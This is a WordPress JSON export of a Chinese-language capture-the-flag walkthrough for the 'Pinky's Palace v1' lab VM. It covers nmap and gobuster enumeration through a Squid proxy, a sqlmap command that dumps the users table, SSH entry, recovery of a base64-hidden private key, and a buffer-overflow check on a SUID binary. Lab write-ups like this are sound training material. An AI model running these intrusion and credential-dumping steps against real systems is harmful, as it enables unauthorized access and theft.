{"id":368,"date":"2024-05-10T18:08:54","date_gmt":"2024-05-10T10:08:54","guid":{"rendered":"http:\/\/xiyu12.top\/?p=368"},"modified":"2024-05-10T18:08:54","modified_gmt":"2024-05-10T10:08:54","slug":"pinkys-palace-v1","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=368","title":{"rendered":"PINKY’S PALACE: V1"},"content":{"rendered":"\n

\u4e00\u3001\u4fe1\u606f\u6536\u96c6<\/h2>\n\n\n\n
sudo nmap -sT --min-rate 10000 -p- 192.168.56.3\nStarting Nmap 7.92 ( https:\/\/nmap.org ) at 2024-05-10 17:33 CST\nNmap scan report for pinkys-palace (192.168.56.3)\nHost is up (0.00030s latency).\nNot shown: 65532 closed tcp ports (conn-refused)\nPORT      STATE SERVICE\n8080\/tcp  open  http-proxy\n31337\/tcp open  Elite\n64666\/tcp open  unknown\nMAC Address: 08:00:27:A3:C5:2A (Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 4.84 seconds\n<\/code><\/pre>\n\n\n\n
sudo nmap -sC -sV -p 8080,31337,64666  192.168.56.3\nStarting Nmap 7.92 ( https:\/\/nmap.org ) at 2024-05-10 17:33 CST\nNmap scan report for pinkys-palace (192.168.56.3)\nHost is up (0.00040s latency).\n\nPORT      STATE SERVICE    VERSION\n8080\/tcp  open  http       nginx 1.10.3\n|_http-server-header: nginx\/1.10.3\n|_http-title: 403 Forbidden\n31337\/tcp open  http-proxy Squid http proxy 3.5.23\n|_http-server-header: squid\/3.5.23\n|_http-title: ERROR: The requested URL could not be retrieved\n64666\/tcp open  ssh        OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 df:02:12:4f:4c:6d:50:27:6a:84:e9:0e:5b:65:bf:a0 (RSA)\n|   256 0a:ad:aa:c7:16:f7:15:07:f0:a8:50:23:17:f3:1c:2e (ECDSA)\n|_  256 4a:2d:e5:d8:ee:69:61:55:bb:db:af:29:4e:54:52:2f (ED25519)\nMAC Address: 08:00:27:A3:C5:2A (Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 27.05 seconds\n\n<\/code><\/pre>\n\n\n\n
sudo nmap --script=vuln  -p 8080,31337,64666 192.168.56.3\nStarting Nmap 7.92 ( https:\/\/nmap.org ) at 2024-05-10 17:34 CST\nNmap scan report for pinkys-palace (192.168.56.3)\nHost is up (0.00041s latency).\n\nPORT      STATE SERVICE\n8080\/tcp  open  http-proxy\n31337\/tcp open  Elite\n64666\/tcp open  unknown\nMAC Address: 08:00:27:A3:C5:2A (Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 62.79 seconds\n<\/code><\/pre>\n\n\n\n
8080 nginx\/1.10.3   \u7f51\u9875<\/p>\n\n\n\n
Squid http proxy 3.5.23  \u4ee3\u7406\u670d\u52a1\u5668<\/p>\n\n\n\n
 64666 OpenSSH 7.4p1<\/p>\n\n\n\n
\u8bbf\u95ee http:\/\/192.168.56.3:8080    <\/p>\n\n\n\n
403 \u65e0\u6743\u9650\u8bbf\u95ee     \u5c1d\u8bd5\u8bbf\u95ee Web \u670d\u52a1\u5668\u4e0a\u7684\u4efb\u4f55\u9875\u9762\u90fd\u4f1a\u8fd4\u56de\u7981\u6b62\u54cd\u5e94\uff0c\u8fd9\u610f\u5473\u7740\u914d\u7f6e\u4e0d\u5141\u8bb8\u8fdc\u7a0b\u8bbf\u95ee\u5185\u5bb9<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5bf9\u7f51\u9875\u8fdb\u884c\u76ee\u5f55\u626b\u63cf  <\/p>\n\n\n\n
\u4f7f\u7528  192.168.56.3:8080  \u65e0\u6cd5\u8bbf\u95ee    \u4f7f\u7528127.0.0.1:8080   \u5f53\u505a\u672c\u5730\u8bbf\u95ee \u8ba9nignx \u653e\u8fc7<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
gobuster dir   --proxy http:\/\/192.168.56.3:31337  -u http:\/\/127.0.0.1:8080 --wordlist \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt  -x .txt,.php,.html               \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/127.0.0.1:8080\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] Proxy:                   http:\/\/192.168.56.3:31337\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,html,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html           (Status: 200) [Size: 229]\n\/littlesecrets-main   (Status: 301) [Size: 185] [--> http:\/\/127.0.0.1:8080\/littlesecrets-main\/]\n<\/code><\/pre>\n\n\n\n
\u4e8c\u3001\u83b7\u5f97\u7acb\u8db3\u70b9<\/h2>\n\n\n\n
\u5728\u6d4f\u89c8\u5668\u5f00\u542f\u4ee3\u7406\u8bbf\u95ee\u7f51\u9875  http:\/\/127.0.0.1:8080\/littlesecrets-main\/<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4f7f\u7528sqlmap \u6d4b\u8bd5<\/p>\n\n\n\n
sqlmap -u http:\/\/127.0.0.1:8080\/littlesecrets-main\/login.php --dbms=mysql --proxy=http:\/\/192.168.56.3:31337 --data=\"user=adm&pass=passw\" -D pinky_sec_db  -T users -C user,pass --dump  --level=5 --risk=3\n<\/code><\/pre>\n\n\n\n
ssh pinkymanage@192.168.56.3 -p 64666  \u767b\u9646shell  \u83b7\u5f97\u7acb\u8db3\u70b9<\/p>\n\n\n\n
\u4e09\u3001\u63d0\u6743<\/h2>\n\n\n\n
cd \/var\/www\/html\npinkymanage@pinkys-palace:\/var\/www\/html$ ls\nindex.html  littlesecrets-main\npinkymanage@pinkys-palace:\/var\/www\/html$ cd littlesecrets-main\/\npinkymanage@pinkys-palace:\/var\/www\/html\/littlesecrets-main$ ls\nindex.html login.php logs.php ultrasecretadminf1l35\npinkymanage@pinkys-palace:\/var\/www\/html\/littlesecrets-main$ cd ultrasecretadminf1l35\/\npinkymanage@pinkys-palace:\/var\/www\/html\/littlesecrets-main\/ultrasecretadminf1l35$ ls -al\ntotal 16\ndrwxr-xr-x 2 root root 4096 Feb  2  2018 .\ndrwxr-xr-x 3 root root 4096 Feb  2  2018 ..\n-rw-r--r-- 1 root root   99 Feb  2  2018 note.txt\n-rw-r--r-- 1 root root 2270 Feb  2  2018 .ultrasecret\ncat note.txt\nHmm just in case I get locked out of my server I put this rsa key here.. Nobody will find it heh..\n<\/code><\/pre>\n\n\n\n
\u83b7\u5f97\u4e00\u4e2assh \u7684\u5bc6\u94a5   \u9700\u8981base64  \u89e3\u7801<\/p>\n\n\n\n
cat .ultrasecret \ncat .ultrasecret | base64 -d  >>id\nchmod 600 id\n ssh -i id pinky@192.168.56.3 -p64666 <\/code><\/pre>\n\n\n\n
\u767b\u9646shell  \u63d0\u6743\u5230pinky<\/p>\n\n\n\n
pinky@pinkys-palace:~$ find \/ -perm \/4000 2>\/dev\/null
\/bin\/umount
\/bin\/su
\/bin\/mount
\/bin\/ping
\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper
\/usr\/lib\/squid\/pinger
\/usr\/lib\/eject\/dmcrypt-get-device
\/usr\/lib\/openssh\/ssh-keysign
\/usr\/bin\/chsh
\/usr\/bin\/gpasswd
\/usr\/bin\/passwd
\/usr\/bin\/chfn
\/usr\/bin\/newgrp
\/usr\/bin\/sudo
\/home\/pinky\/adminhelper
pinky@pinkys-palace:~$ ls -al
total 44
drwx—— 3 pinky pinky 4096 Feb 2 2018 .
drwxr-xr-x 4 root root 4096 Feb 2 2018 ..
-rwsr-xr-x 1 root root 8880 Feb 2 2018 adminhelper
lrwxrwxrwx 1 root root 9 Feb 1 2018 .bash_history -> \/dev\/null
-rw-r–r– 1 pinky pinky 220 Jan 28 2018 .bash_logout
-rw-r–r– 1 pinky pinky 3526 Jan 28 2018 .bashrc
lrwxrwxrwx 1 pinky pinky 9 Feb 1 2018 .mysql_history -> \/dev\/null
-rw-r–r– 1 root root 280 Feb 2 2018 note.txt
-rw-r–r– 1 pinky pinky 675 Jan 28 2018 .profile
drwx—— 2 pinky pinky 4096 May 10 02:53 .ssh
-rw——- 1 pinky pinky 1815 Feb 2 2018 .viminfo
pinky@pinkys-palace:~$<\/p>\n\n\n\n
\u6709\u4e00\u4e2a\u6267\u884c\u6587\u4ef6<\/p>\n\n\n\n
pinky@pinkys-palace:~$ strings adminhelper \n\/lib64\/ld-linux-x86-64.so.2\nlibc.so.6\nstrcpy\nputs\nsetegid\nseteuid\nexecve\n__cxa_finalize\n__libc_start_main\n_ITM_deregisterTMCloneTable\n__gmon_start__\n_Jv_RegisterClasses\n_ITM_registerTMCloneTable\nGLIBC_2.2.5\n%b       \n=y       \n=9       \n52       \nAWAVA\nAUATL\n[]A\\A]A^A_\n\/bin\/sh\n;*3$\"\nGCC: (Debian 6.3.0-18) 6.3.0 20170516\ncrtstuff.c\n<\/code><\/pre>\n\n\n\n
\u53d1\u73b0 strcpy   \u53ef\u80fd\u5b58\u5728  \u7f13\u51b2\u533a\u6ea2\u51fa<\/p>\n\n\n\n
pinky@pinkys-palace:~$ .\/adminhelper $(python -c\"print('A'*200)\")\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nSegmentation fault<\/code><\/pre>\n\n\n\n
\u786e\u5b9a\u5b58\u5728 \u7f13\u51b2\u533a\u6ea2\u51fa<\/p>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
\u4e00\u3001\u4fe1\u606f\u6536\u96c6 8080 nginx\/1.10.3 \u7f51\u9875 Squid http proxy 3.5.23 \u4ee3\u7406\u670d […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[49,83,87,115],"class_list":["post-368","post","type-post","status-publish","format-standard","hentry","category-target-aircraft","tag-nginx-403","tag-squid","tag-sshbase64","tag-115"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/368","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=368"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/368\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=368"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=368"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=368"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}